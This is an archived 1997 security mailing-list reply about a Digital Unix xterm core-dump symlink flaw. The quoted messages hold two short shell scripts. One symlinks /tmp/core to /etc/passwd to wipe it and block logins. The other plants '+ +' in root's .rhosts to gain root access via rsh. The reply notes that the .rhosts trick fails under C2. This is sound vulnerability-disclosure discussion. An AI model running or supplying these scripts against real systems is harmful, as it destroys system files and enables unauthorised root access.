Re: Digital Unix Security Problem

Tom Leffingwell (tom@SBA.MIAMI.EDU)
Thu, 13 Nov 1997 18:22:58 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Aleph One: "Pentium processor invalid instruction erratum"
Previous message: Charles M. Hannum: "Re: Pentium bug workaround in NetBSD (was Re: Intel Pentium Bug: BSDI"
Maybe in reply to: Tom Leffingwell: "Digital Unix Security Problem"

DU doesn't allow +'s in /.rhosts, at least under C2, and I think so in
general. It doesn't seem to work even if you specify a user, either.

On Thu, 13 Nov 1997, Andrew Brown wrote:

> > Even with a buffer overflow, I've never seen anyone exploit on one
> >DU. If anyone has done so sucessfully, plese email me. Despite that, a
> >person with basic knowledge of unix could easily do something like:
> >
> >#/!bin/csh
> >cd /tmp
> >ln -s /etc/passwd /tmp/core
> >setenv DISPLAY abcdefghi
> >/usr/bin/X11/xterm
> >
> > The contents of /etc/passwd becomes xterm's core, preventing
> >further logins. Obviously you could do things without an immediate impact
> >such as ln -s /vmunix /tmp/core.
>
> or...if the system you're on is actually running r-services, you could do
>
> #!/bin/sh
> DISPLAY="
> + +
> "
> export DISPLAY
> cd /tmp
> ln -s /.rhosts /tmp/core
> /usr/bin/X11/xterm
> rsh localhost
>
> which sets the DISPLAY variable to an "admit all from all" line and
> the core dump will go into root's .rhosts file. then all that remains
> is the rsh localhost and you're all set!
>
> considerably easier than a buffer overflow exploit...
>
> --
> |-----< "CODE WARRIOR" >-----|
> andrew@echonyc.com (TheMan) * "ah! i see you have the internet
> codewarrior@daemon.org that goes *ping*!"
> warfare@graffiti.com * "information is power -- share the wealth."
>

Next message: Aleph One: "Pentium processor invalid instruction erratum"
Previous message: Charles M. Hannum: "Re: Pentium bug workaround in NetBSD (was Re: Intel Pentium Bug: BSDI"
Maybe in reply to: Tom Leffingwell: "Digital Unix Security Problem"